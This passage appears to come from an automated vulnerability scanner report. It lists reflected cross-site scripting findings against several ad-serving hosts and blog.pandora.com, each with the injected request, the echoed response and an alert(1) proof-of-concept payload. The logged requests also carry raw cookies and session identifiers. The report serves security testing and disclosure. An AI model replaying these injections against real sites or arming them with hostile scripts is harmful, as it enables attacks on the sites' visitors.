Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJipx9oC)FXduyOWimI4KKhq.W^v=7v!+J; sess=1; uuid2=4760492999213801733

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 10-Jan-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 09-Apr-2011 02:03:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 09 Jan 2011 02:03:03 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match16c38'-alert(1)-'3fc1cb53627?admeld_adprovider_id=193&external_user_id=4760492999213801733&expiration=0" width="0" height="0"/>');

3.4. http://ads.adxpose.com/ads/ads.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload b4f4c<script>alert(1)</script>a52e440cf62 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93533324557B6D4C66B8D07696AFDC1E; Path=/
ETag: "0-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Set-Cookie: evlu=075d4a72-84c6-47f7-8419-eab875d87006; Domain=adxpose.com; Expires=Fri, 27-Jan-2079 05:15:56 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:01:49 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
SE_LOG_EVENT__("000_000_3",b,i,"",Math.round(V.left)+","+Math.round(V.top),L+","+F,z,j,k,s,P)}}q=n.inView}}}if(!__ADXPOSE_PREFS__.override){__ADXPOSE_WIDGET_IN_VIEW__("container_ZC45X9Axu6NOUFfX_261541b4f4c<script>alert(1)</script>a52e440cf62".replace(/[^\w\d]/g,""),"ZC45X9Axu6NOUFfX_261541b4f4c<script>
...[SNIP]...

3.5. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f479"-alert(1)-"9f537d45c44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1678185&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel&1f479"-alert(1)-"9f537d45c44=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536160339719001&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:02:46 GMT
Pragma: no-cache
Content-Length: 5050
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?1f479"-alert(1)-"9f537d45c44=1&Z=1x1&admeld_callback=http%3a%2f%2ftag.admeld.com%2fpixel&admeld_dataprovider_id=11&admeld_user_id=6acccca4%2dd0e4%2d464e%2da824%2df67cb28d5556&s=1678185&_salt=2966712294";var RM_POP_COOKIE_NAME='ym
...[SNIP]...

3.6. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a9"-alert(1)-"c8cb9b7364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=628381\&645a9"-alert(1)-"c8cb9b7364=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:03:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 09 Jan 2011 02:03:52 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?645a9"-alert(1)-"c8cb9b7364=1&Z=728x90&s=628381%5c&_salt=3434864609";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new
...[SNIP]...

3.7. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 5975c<script>alert(1)</script>1fdfc17438e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=85975c<script>alert(1)</script>1fdfc17438e&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:10 GMT
Date: Sun, 09 Jan 2011 02:02:10 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"85975c<script>alert(1)</script>1fdfc17438e", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.8. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 9a333<script>alert(1)</script>8a4c3dbbfb7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=1641219a333<script>alert(1)</script>8a4c3dbbfb7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"1641219a333<script>alert(1)</script>8a4c3dbbfb7", c15:"", c16:"", r:""});

3.9. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 74eae<script>alert(1)</script>372646ead38 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=&c10=164121&c15=74eae<script>alert(1)</script>372646ead38 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:14 GMT
Date: Sun, 09 Jan 2011 02:02:14 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"74eae<script>alert(1)</script>372646ead38", c16:"", r:""});

3.10. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload ae5ba<script>alert(1)</script>adbfd959a51 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404ae5ba<script>alert(1)</script>adbfd959a51&c3=9&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:11 GMT
Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404ae5ba<script>alert(1)</script>adbfd959a51", c3:"9", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.11. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c8a72<script>alert(1)</script>d9a8abda3bb was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9c8a72<script>alert(1)</script>d9a8abda3bb&c4=4762&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:11 GMT
Date: Sun, 09 Jan 2011 02:02:11 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9c8a72<script>alert(1)</script>d9a8abda3bb", c4:"4762", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.12. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4c5b<script>alert(1)</script>45d5c6bad11 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762c4c5b<script>alert(1)</script>45d5c6bad11&c5=&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:12 GMT
Date: Sun, 09 Jan 2011 02:02:12 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762c4c5b<script>alert(1)</script>45d5c6bad11", c5:"", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.13. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5bdff<script>alert(1)</script>d89896135b9 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=5bdff<script>alert(1)</script>d89896135b9&c6=&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"5bdff<script>alert(1)</script>d89896135b9", c6:"", c10:"164121", c15:"", c16:"", r:""});

3.14. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload dcd0e<script>alert(1)</script>d6e3eca22a6 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=9&c4=4762&c5=&c6=dcd0e<script>alert(1)</script>d6e3eca22a6&c10=164121&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 16 Jan 2011 02:02:13 GMT
Date: Sun, 09 Jan 2011 02:02:13 GMT
Connection: close
Content-Length: 3591

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"9", c4:"4762", c5:"", c6:"dcd0e<script>alert(1)</script>d6e3eca22a6", c10:"164121", c15:"", c16:"", r:""});

3.15. http://blog.pandora.com/faq [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cc76e<script>alert(1)</script>bcb67c3cc6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqcc76e<script>alert(1)</script>bcb67c3cc6e HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 327


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqcc76e<script>alert(1)</script>bcb67c3cc6e was not found on this server.</p>
...[SNIP]...

3.16. http://blog.pandora.com/faq/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9edc<script>alert(1)</script>e1d9afc7813 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faqc9edc<script>alert(1)</script>e1d9afc7813/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 328


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faqc9edc<script>alert(1)</script>e1d9afc7813/ was not found on this server.</p>
...[SNIP]...

3.17. http://blog.pandora.com/faq/index.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21a51<script>alert(1)</script>fb51523ad13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq21a51<script>alert(1)</script>fb51523ad13/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 337


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /faq21a51<script>alert(1)</script>fb51523ad13/index.xml was not found on this server.</p>
...[SNIP]...

3.18. http://blog.pandora.com/faq/index.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /faq/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7f75<script>alert(1)</script>8dac30374f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

